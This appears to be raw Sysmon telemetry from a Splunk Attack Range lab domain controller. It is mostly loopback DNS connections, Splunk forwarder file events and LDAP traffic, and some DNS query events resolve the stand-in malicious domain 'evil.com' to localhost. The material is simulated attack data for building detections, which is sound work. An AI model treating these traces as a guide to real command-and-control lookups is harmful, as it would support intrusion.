23542300x8000000000000000193402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:30.368{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8EF267D297A98B5100A9139207AF6FF,SHA256=70FC1B5396E1BF22342B14261D6A90C9AA55E2AF4F32E94286BA695D7A3A9EA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.301{00000000-0000-0000-0000-000000000000}708<unknown process>-udptruefalse127.0.0.1-49195-false127.0.0.1-53domain 354300x8000000000000000193400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.300{00000000-0000-0000-0000-000000000000}708<unknown process>-udpfalsefalse127.0.0.1-49194-false127.0.0.1-53domain 354300x8000000000000000193399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.300{00000000-0000-0000-0000-000000000000}708<unknown process>-udptruefalse127.0.0.1-49194-false127.0.0.1-53domain 354300x8000000000000000193398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.300{00000000-0000-0000-0000-000000000000}708<unknown process>-udpfalsefalse127.0.0.1-49193-false127.0.0.1-53domain 354300x8000000000000000193397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.299{00000000-0000-0000-0000-000000000000}708<unknown process>-udptruefalse127.0.0.1-49193-false127.0.0.1-53domain 354300x8000000000000000193396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.229{00000000-0000-0000-0000-000000000000}5580<unknown process>-udpfalsefalse127.0.0.1-49192-false127.0.0.1-53domain 354300x8000000000000000193395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.229{00000000-0000-0000-0000-000000000000}5580<unknown process>-udptruefalse127.0.0.1-49192-false127.0.0.1-53domain 354300x8000000000000000193394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.229{00000000-0000-0000-0000-000000000000}5580<unknown process>-udpfalsefalse127.0.0.1-49191-false127.0.0.1-53domain 354300x8000000000000000193393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.229{00000000-0000-0000-0000-000000000000}5580<unknown process>-udptruefalse127.0.0.1-49191-false127.0.0.1-53domain 354300x8000000000000000193392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.228{00000000-0000-0000-0000-000000000000}5580<unknown process>-udpfalsefalse127.0.0.1-49190-false127.0.0.1-53domain 354300x8000000000000000193391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.228{00000000-0000-0000-0000-000000000000}5580<unknown process>-udptruefalse127.0.0.1-49190-false127.0.0.1-53domain 354300x8000000000000000193390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.145{00000000-0000-0000-0000-000000000000}4768<unknown process>-udptruefalse127.0.0.1-49189-false127.0.0.1-53domain 354300x8000000000000000193389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.145{00000000-0000-0000-0000-000000000000}4768<unknown process>-udpfalsefalse127.0.0.1-49188-false127.0.0.1-53domain 354300x8000000000000000193388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.144{00000000-0000-0000-0000-000000000000}4768<unknown process>-udptruefalse127.0.0.1-49188-false127.0.0.1-53domain 354300x8000000000000000193387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.144{00000000-0000-0000-0000-000000000000}4768<unknown process>-udpfalsefalse127.0.0.1-49187-false127.0.0.1-53domain 354300x8000000000000000193386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.144{00000000-0000-0000-0000-000000000000}4768<unknown process>-udptruefalse127.0.0.1-49187-false127.0.0.1-53domain 354300x8000000000000000193385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:27.990{00000000-0000-0000-0000-000000000000}5700<unknown process>-udptruefalse127.0.0.1-49183-false127.0.0.1-53domain 354300x8000000000000000193451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.391{00000000-0000-0000-0000-000000000000}3972<unknown process>-udptruefalse127.0.0.1-49233-false127.0.0.1-53domain 354300x8000000000000000193450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.314{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-49228-false127.0.0.1-53domain 354300x8000000000000000193449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.241{00000000-0000-0000-0000-000000000000}3744<unknown process>-udptruefalse127.0.0.1-49227-false127.0.0.1-53domain 354300x8000000000000000193448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.241{00000000-0000-0000-0000-000000000000}3744<unknown process>-udpfalsefalse127.0.0.1-49226-false127.0.0.1-53domain 354300x8000000000000000193447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.241{00000000-0000-0000-0000-000000000000}3744<unknown process>-udptruefalse127.0.0.1-49226-false127.0.0.1-53domain 354300x8000000000000000193446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.241{00000000-0000-0000-0000-000000000000}3744<unknown process>-udpfalsefalse127.0.0.1-49225-false127.0.0.1-53domain 354300x8000000000000000193445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.241{00000000-0000-0000-0000-000000000000}3744<unknown process>-udptruefalse127.0.0.1-49225-false127.0.0.1-53domain 354300x8000000000000000193444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.173{00000000-0000-0000-0000-000000000000}7904<unknown process>-udptruefalse127.0.0.1-49222-false127.0.0.1-53domain 354300x8000000000000000193443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.039{00000000-0000-0000-0000-000000000000}5988<unknown process>-udpfalsefalse127.0.0.1-49218-false127.0.0.1-53domain 354300x8000000000000000193442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.039{00000000-0000-0000-0000-000000000000}5988<unknown process>-udptruefalse127.0.0.1-49218-false127.0.0.1-53domain 354300x8000000000000000193441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.039{00000000-0000-0000-0000-000000000000}5988<unknown process>-udpfalsefalse127.0.0.1-49217-false127.0.0.1-53domain 354300x8000000000000000193440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.039{00000000-0000-0000-0000-000000000000}5988<unknown process>-udptruefalse127.0.0.1-49217-false127.0.0.1-53domain 354300x8000000000000000193439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.039{00000000-0000-0000-0000-000000000000}5988<unknown process>-udpfalsefalse127.0.0.1-49216-false127.0.0.1-53domain 354300x8000000000000000193438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.038{00000000-0000-0000-0000-000000000000}5988<unknown process>-udptruefalse127.0.0.1-49216-false127.0.0.1-53domain 354300x8000000000000000193437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.969{00000000-0000-0000-0000-000000000000}6052<unknown process>-udpfalsefalse127.0.0.1-49215-false127.0.0.1-53domain 354300x8000000000000000193436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.969{00000000-0000-0000-0000-000000000000}6052<unknown process>-udptruefalse127.0.0.1-49215-false127.0.0.1-53domain 354300x8000000000000000193435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.969{00000000-0000-0000-0000-000000000000}6052<unknown process>-udpfalsefalse127.0.0.1-49214-false127.0.0.1-53domain 354300x8000000000000000193434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.969{00000000-0000-0000-0000-000000000000}6052<unknown process>-udptruefalse127.0.0.1-49214-false127.0.0.1-53domain 354300x8000000000000000193433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.968{00000000-0000-0000-0000-000000000000}6052<unknown process>-udpfalsefalse127.0.0.1-49213-false127.0.0.1-53domain 354300x8000000000000000193432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.968{00000000-0000-0000-0000-000000000000}6052<unknown process>-udptruefalse127.0.0.1-49213-false127.0.0.1-53domain 22542200x8000000000000000193431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.670{00000000-0000-0000-0000-000000000000}7336evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000193430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.593{00000000-0000-0000-0000-000000000000}6676evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000193429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.528{00000000-0000-0000-0000-000000000000}2764evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000193428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.459{00000000-0000-0000-0000-000000000000}4660evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000193427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.393{00000000-0000-0000-0000-000000000000}3972evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000193426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.318{00000000-0000-0000-0000-000000000000}8104evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000193425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.895{00000000-0000-0000-0000-000000000000}7264<unknown process>-udpfalsefalse127.0.0.1-49212-false127.0.0.1-53domain 354300x8000000000000000193424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.895{00000000-0000-0000-0000-000000000000}7264<unknown process>-udptruefalse127.0.0.1-49212-false127.0.0.1-53domain 354300x8000000000000000193423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.811{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-49211-false127.0.0.1-53domain 354300x8000000000000000193422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.811{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-49211-false127.0.0.1-53domain 354300x8000000000000000193421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.811{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-49210-false127.0.0.1-53domain 354300x8000000000000000193420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.811{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-49210-false127.0.0.1-53domain 354300x8000000000000000193419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.811{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-49209-false127.0.0.1-53domain 354300x8000000000000000193418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.810{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-49209-false127.0.0.1-53domain 354300x8000000000000000193417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.736{00000000-0000-0000-0000-000000000000}4672<unknown process>-udpfalsefalse127.0.0.1-49208-false127.0.0.1-53domain 354300x8000000000000000193416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.736{00000000-0000-0000-0000-000000000000}4672<unknown process>-udptruefalse127.0.0.1-49208-false127.0.0.1-53domain 354300x8000000000000000193415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.736{00000000-0000-0000-0000-000000000000}4672<unknown process>-udpfalsefalse127.0.0.1-49207-false127.0.0.1-53domain 354300x8000000000000000193414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.736{00000000-0000-0000-0000-000000000000}4672<unknown process>-udptruefalse127.0.0.1-49207-false127.0.0.1-53domain 354300x8000000000000000193413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.736{00000000-0000-0000-0000-000000000000}4672<unknown process>-udpfalsefalse127.0.0.1-49206-false127.0.0.1-53domain 354300x8000000000000000193412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.736{00000000-0000-0000-0000-000000000000}4672<unknown process>-udptruefalse127.0.0.1-49206-false127.0.0.1-53domain 354300x8000000000000000193411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.572{00000000-0000-0000-0000-000000000000}3548<unknown process>-udptruefalse127.0.0.1-49200-false127.0.0.1-53domain 354300x8000000000000000193410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.485{00000000-0000-0000-0000-000000000000}2536<unknown process>-udptruefalse127.0.0.1-49197-false127.0.0.1-53domain 354300x8000000000000000193409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.404{00000000-0000-0000-0000-000000000000}4924<unknown process>-udptruefalse127.0.0.1-49196-false127.0.0.1-53domain 354300x8000000000000000193408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.301{00000000-0000-0000-0000-000000000000}708<unknown process>-udpfalsefalse127.0.0.1-49195-false127.0.0.1-53domain 354300x8000000000000000193407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.145{00000000-0000-0000-0000-000000000000}4768<unknown process>-udpfalsefalse127.0.0.1-49189-false127.0.0.1-53domain 354300x8000000000000000193406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:28.060{00000000-0000-0000-0000-000000000000}1372<unknown process>-udptruefalse127.0.0.1-49184-false127.0.0.1-53domain 354300x8000000000000000193405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:27.990{00000000-0000-0000-0000-000000000000}5700<unknown process>-udpfalsefalse127.0.0.1-49183-false127.0.0.1-53domain 354300x8000000000000000193404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:27.813{00000000-0000-0000-0000-000000000000}4932<unknown process>-udpfalsefalse127.0.0.1-49179-false127.0.0.1-53domain 354300x8000000000000000193403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:27.813{00000000-0000-0000-0000-000000000000}4932<unknown process>-udpfalsefalse127.0.0.1-49178-false127.0.0.1-53domain 354300x8000000000000000193486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.668{00000000-0000-0000-0000-000000000000}7336<unknown process>-udpfalsefalse127.0.0.1-49245-false127.0.0.1-53domain 354300x8000000000000000193485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.668{00000000-0000-0000-0000-000000000000}7336<unknown process>-udptruefalse127.0.0.1-49245-false127.0.0.1-53domain 354300x8000000000000000193484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.668{00000000-0000-0000-0000-000000000000}7336<unknown process>-udpfalsefalse127.0.0.1-49244-false127.0.0.1-53domain 354300x8000000000000000193483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.668{00000000-0000-0000-0000-000000000000}7336<unknown process>-udptruefalse127.0.0.1-49244-false127.0.0.1-53domain 354300x8000000000000000193482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.668{00000000-0000-0000-0000-000000000000}7336<unknown process>-udpfalsefalse127.0.0.1-49243-false127.0.0.1-53domain 354300x8000000000000000193481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.667{00000000-0000-0000-0000-000000000000}7336<unknown process>-udptruefalse127.0.0.1-49243-false127.0.0.1-53domain 354300x8000000000000000193480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.592{00000000-0000-0000-0000-000000000000}6676<unknown process>-udpfalsefalse127.0.0.1-49242-false127.0.0.1-53domain 354300x8000000000000000193479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.592{00000000-0000-0000-0000-000000000000}6676<unknown process>-udptruefalse127.0.0.1-49242-false127.0.0.1-53domain 354300x8000000000000000193478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.591{00000000-0000-0000-0000-000000000000}6676<unknown process>-udpfalsefalse127.0.0.1-49241-false127.0.0.1-53domain 354300x8000000000000000193477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.591{00000000-0000-0000-0000-000000000000}6676<unknown process>-udptruefalse127.0.0.1-49241-false127.0.0.1-53domain 354300x8000000000000000193476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.591{00000000-0000-0000-0000-000000000000}6676<unknown process>-udpfalsefalse127.0.0.1-49240-false127.0.0.1-53domain 354300x8000000000000000193475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.591{00000000-0000-0000-0000-000000000000}6676<unknown process>-udptruefalse127.0.0.1-49240-false127.0.0.1-53domain 354300x8000000000000000193474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.526{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-49239-false127.0.0.1-53domain 354300x8000000000000000193473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.526{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-49239-false127.0.0.1-53domain 354300x8000000000000000193472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.526{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-49238-false127.0.0.1-53domain 354300x8000000000000000193471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.526{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-49238-false127.0.0.1-53domain 354300x8000000000000000193470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.525{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-49237-false127.0.0.1-53domain 354300x8000000000000000193469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.525{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-49237-false127.0.0.1-53domain 354300x8000000000000000193468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.456{00000000-0000-0000-0000-000000000000}4660<unknown process>-udpfalsefalse127.0.0.1-49236-false127.0.0.1-53domain 354300x8000000000000000193467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.456{00000000-0000-0000-0000-000000000000}4660<unknown process>-udptruefalse127.0.0.1-49236-false127.0.0.1-53domain 354300x8000000000000000193466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.456{00000000-0000-0000-0000-000000000000}4660<unknown process>-udpfalsefalse127.0.0.1-49235-false127.0.0.1-53domain 354300x8000000000000000193465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.456{00000000-0000-0000-0000-000000000000}4660<unknown process>-udptruefalse127.0.0.1-49235-false127.0.0.1-53domain 354300x8000000000000000193464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.456{00000000-0000-0000-0000-000000000000}4660<unknown process>-udpfalsefalse127.0.0.1-49234-false127.0.0.1-53domain 354300x8000000000000000193463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.456{00000000-0000-0000-0000-000000000000}4660<unknown process>-udptruefalse127.0.0.1-49234-false127.0.0.1-53domain 354300x8000000000000000193462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.391{00000000-0000-0000-0000-000000000000}3972<unknown process>-udpfalsefalse127.0.0.1-49233-false127.0.0.1-53domain 354300x8000000000000000193461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.390{00000000-0000-0000-0000-000000000000}3972<unknown process>-udpfalsefalse127.0.0.1-49232-false127.0.0.1-53domain 354300x8000000000000000193460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.390{00000000-0000-0000-0000-000000000000}3972<unknown process>-udptruefalse127.0.0.1-49232-false127.0.0.1-53domain 354300x8000000000000000193459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.390{00000000-0000-0000-0000-000000000000}3972<unknown process>-udpfalsefalse127.0.0.1-49231-false127.0.0.1-53domain 354300x8000000000000000193458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.390{00000000-0000-0000-0000-000000000000}3972<unknown process>-udptruefalse127.0.0.1-49231-false127.0.0.1-53domain 354300x8000000000000000193457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.315{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-49230-false127.0.0.1-53domain 354300x8000000000000000193456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.315{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-49230-false127.0.0.1-53domain 354300x8000000000000000193455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.315{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-49229-false127.0.0.1-53domain 354300x8000000000000000193454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.315{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-49229-false127.0.0.1-53domain 354300x8000000000000000193453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.315{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-49228-false127.0.0.1-53domain 354300x8000000000000000193452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:29.242{00000000-0000-0000-0000-000000000000}3744<unknown process>-udpfalsefalse127.0.0.1-49227-false127.0.0.1-53domain 354300x8000000000000000193487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:31.657{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56319-false10.0.1.12-8000- 23542300x8000000000000000193488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:35.048{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=DCFE2ACF4F3D63C85D69E25F883CD5BD,SHA256=5C654A60CE86332DB242F904EC23CE526C239684FFDA3ED3F2335B989752BF89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:36.709{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56320-false10.0.1.12-8000- 23542300x8000000000000000193493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:42.667{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C73B4865DD4C5E16867239F371A57737,SHA256=EF5FC195E91684AC951D00689B566F78411B078E1F70457320DC510744445C43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:42.665{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C816BAEDDB22D7823B1C56CC93094347,SHA256=EB305438C55A55FE9A9F18E80A0BF0A539DD4778A6E856DE7056E7F8EA622CE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:40.725{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56321-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:40.725{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56321-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 23542300x8000000000000000193494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:14:43.187{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 